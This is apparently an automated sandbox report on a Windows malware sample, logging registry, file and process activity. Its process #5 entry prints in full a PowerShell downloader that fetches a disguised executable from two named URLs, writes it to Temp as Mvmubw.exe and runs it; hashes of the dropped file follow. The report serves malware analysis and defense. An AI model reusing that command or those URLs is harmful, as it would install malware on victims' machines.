| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat | show_window = SW_HIDE |
|
1 | |
| Get Info | type = PROCESS_BASIC_INFORMATION |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Operating System |
|
4 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
125 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = HOMEPATH, result_out = \Users\aDU0VK IWA5kLS |
|
1 | |
| Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Get Environment String | name = HomePath, result_out = \Users\aDU0VK IWA5kLS |
|
1 | |
| Set Environment String | name = PSMODULEPATH, value = C:\Users\aDU0VK IWA5kLS\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 |
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cmd /c ""C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat" " |
| Initial Working Directory | C:\Users\aDU0VK IWA5kLS\Desktop\ |
| Monitor | Start Time: 00:01:01, Reason: Child Process |
| Unmonitor | End Time: 00:02:26, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:25 |
| Information | Value |
|---|---|
| PID | 0xa24 |
| Parent PID | 0x9f8 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | AUFDDCNTXWT\aDU0VK IWA5kLS |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A28
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Get Info | C:\Users\aDU0VK IWA5kLS\Desktop | type = file_attributes |
|
2 | |
| Get Info | "C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat" | type = file_attributes |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
5 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
2 | |
| Open | STD_OUTPUT_HANDLE |
|
22 | ||
| Open | STD_INPUT_HANDLE |
|
4 | ||
| Open | STD_INPUT_HANDLE |
|
4 | ||
| Open | STD_INPUT_HANDLE |
|
7 | ||
| Read | STD_INPUT_HANDLE | size = 8191, size_out = 332 |
|
1 | |
| Read | STD_INPUT_HANDLE | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 10 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 321 |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | ||
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | os_pid = 0xa40, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | ADVAPI32.dll | base_address = 0x7fefdb00000 |
|
1 | |
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49e70000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77320000 |
|
2 | |
| Get Filename | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | ||
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77336d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x773323d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x77328290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x773317e0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = SaferIdentifyLevel, address_out = 0x7fefdb1e470 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = SaferComputeTokenFromLevel, address_out = 0x7fefdb1f9b0 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = SaferCloseLevel, address_out = 0x7fefdb1f660 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2017-09-25 20:33:03 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 94209 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String |
|
6 | ||
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
3 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
4 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
2 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\aDU0VK IWA5kLS\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | PowerShell "function mihyr8([String] $yxuinzaisib){(New-Object System.Net.WebClient).DownloadFile($yxuinzaisib,'C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe');Start-Process 'C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe';}try{mihyr8('http://www.events4u.cz/kas23.png')}catch{mihyr8('http://tregartha-dinnie.co.uk/kas23.png')} |
| Initial Working Directory | C:\Users\aDU0VK IWA5kLS\Desktop\ |
| Monitor | Start Time: 00:01:01, Reason: Child Process |
| Unmonitor | End Time: 00:02:26, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:25 |
| Information | Value |
|---|---|
| PID | 0xa40 |
| Parent PID | 0xa24 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | AUFDDCNTXWT\aDU0VK IWA5kLS |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A44
0x
A48
0x
A4C
0x
A54
0x
A58
0x
A5C
0x
A68
0x
A6C
0x
A70
0x
A74
0x
B04
0x
B14
0x
B20
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\adu0vk iwa5kls\appdata\local\temp\mvmubw.exe | 472.00 KB (483328 bytes) |
MD5:
0ebfd6e45dea48c7f54b5574d69da458
SHA1: 11ad0fae8318bc72e1525c161c5df72a9da9430b SHA256: 3ba1b55c3268529b586e154b9117d25ae6c3667a2e869747c51bd88fd2a7a581 |
|
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Users\aDU0VK IWA5kLS | type = file_attributes |
|
5 | |
| Get Info | C:\ | type = file_attributes |
|
6 | |
| Get Info | C:\Users\aDU0VK IWA5kLS\Desktop | type = file_attributes |
|
9 | |
| Get Info | C:\Users | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aDU0VK IWA5kLS\Documents\WindowsPowerShell\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aDU0VK IWA5kLS\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = file_type |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe | type = file_type |
|
2 | |
| Get Info | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe | type = file_attributes |
|
3 | |
| Open | STD_INPUT_HANDLE |
|
1 | ||
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 4096 |
|
3 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 3315 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 781, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 4096 |
|
41 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 436 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 2530 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 542, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4096 |
|
5 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4018 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 78, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 2762 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 310, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 4096 |
|
17 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 3022 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 50, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 281 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 4096 |
|
62 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 3895 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 201, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 4096 |
|
21 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 3687 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 409, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 2228 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 844, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 3736 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 360, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | size = 4096, size_out = 1459 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | size = 4096, size_out = 0 |
|
1 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe | size = 4096 |
|
7 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe | size = 65198 |
|
1 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe | size = 8776 |
|
1 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe | size = 56628 |
|
1 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe | size = 4356 |
|
3 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe | size = 62892 |
|
1 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe | size = 8516 |
|
1 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe | size = 52792 |
|
1 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe | size = 63888 |
|
1 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe | size = 29040 |
|
1 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe | size = 58600 |
|
1 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe | size = 5808 |
|
1 | |
| Write | C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe | size = 29450 |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Environment |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
2 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
9 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
4 | ||
